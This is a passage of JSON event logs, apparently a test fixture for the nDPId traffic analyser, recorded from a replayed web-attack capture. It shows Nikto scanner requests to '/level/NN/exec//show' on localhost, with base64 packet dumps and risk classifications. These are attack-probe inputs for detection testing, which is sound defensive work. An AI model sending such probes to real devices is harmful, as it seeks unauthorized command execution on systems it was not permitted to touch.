{"hostname":"127.0.0.1","url":"127.0.0.1\/level\/36\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001283)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":1,"flow_last_seen":1576420277615,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277615,"pkt":"AAAAAAAAAAAAAAAACABFAADIj29AAEAGrL5\/AAABfwAAAcYsH5DrNbeX8ap25oAYAED+vAAAAQEICp1m\/pedZv6XR0VUIC9sZXZlbC8zNy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjg0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/37\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001284)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277616,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":1,"flow_last_seen":1576420277616,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277616,"pkt":"AAAAAAAAAAAAAAAACABFAADImrpAAEAGoXN\/AAABfwAAAcYuH5CDY6JF2zT1KYAYAED+vAAAAQEICp1m\/pidZv6YR0VUIC9sZXZlbC8zOC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277616,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/38\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001285)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277618,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":1,"flow_last_seen":1576420277618,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277618,"pkt":"AAAAAAAAAAAAAAAACABFAADIUbFAAEAG6nx\/AAABfwAAAcYwH5C3PmlUu95eg4AYAED+vAAAAQEICp1m\/pqdZv6aR0VUIC9sZXZlbC8zOS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277618,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/39\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001286)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277619,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":1,"flow_last_seen":1576420277619,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277619,"pkt":"AAAAAAAAAAAAAAAACABFAADI5L9AAEAGV25\/AAABfwAAAcYyH5D7t9xCdJSM64AYAED+vAAAAQEICp1m\/pudZv6bR0VUIC9sZXZlbC80MC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjg3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277619,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/40\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001287)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277622,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":1,"flow_last_seen":1576420277622,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277622,"pkt":"AAAAAAAAAAAAAAAACABFAADIjX9AAEAGrq5\/AAABfwAAAcY0H5DiALWBzWdeg4AYAED+vAAAAQEICp1m\/p6dZv6eR0VUIC9sZXZlbC80MS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODgpDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277622,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/41\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001288)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277624,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":1,"flow_last_seen":1576420277624,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277624,"pkt":"AAAAAAAAAAAAAAAACABFAADIagJAAEAG0it\/AAABfwAAAcY2H5Bh+1L\/IgWJKIAYAED+vAAAAQEICp1m\/p+dZv6fR0VUIC9sZXZlbC80Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277624,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/42\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001289)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277625,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":1,"flow_last_seen":1576420277625,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277625,"pkt":"AAAAAAAAAAAAAAAACABFAADI3axAAEAGXoF\/AAABfwAAAcY4H5AuBeVV4Hsa\/oAYAED+vAAAAQEICp1m\/qGdZv6hR0VUIC9sZXZlbC80My9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTApDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277625,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/43\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001290)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277627,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":1,"flow_last_seen":1576420277627,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277627,"pkt":"AAAAAAAAAAAAAAAACABFAADIYLhAAEAG23V\/AAABfwAAAcY6H5DQG1hJOevWU4AYAED+vAAAAQEICp1m\/qOdZv6iR0VUIC9sZXZlbC80NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTEpDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277627,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/44\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001291)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277628,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":1,"flow_last_seen":1576420277628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277628,"pkt":"AAAAAAAAAAAAAAAACABFAADID1ZAAEAGLNh\/AAABfwAAAcY8H5AV\/jesxRnzeoAYAED+vAAAAQEICp1m\/qSdZv6kR0VUIC9sZXZlbC80NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjkyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277628,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/45\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001292)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277630,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":1,"flow_last_seen":1576420277630,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277630,"pkt":"AAAAAAAAAAAAAAAACABFAADI0WBAAEAGas1\/AAABfwAAAcY+H5DCTOmi+t3hCIAYAED+vAAAAQEICp1m\/qWdZv6lR0VUIC9sZXZlbC80Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjkzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277630,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/46\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001293)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277631,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":1,"flow_last_seen":1576420277631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277631,"pkt":"AAAAAAAAAAAAAAAACABFAADIlpVAAEAGpZh\/AAABfwAAAcZAH5Cryq5teKvsJoAYAED+vAAAAQEICp1m\/qedZv6nR0VUIC9sZXZlbC80Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTQpDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277631,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 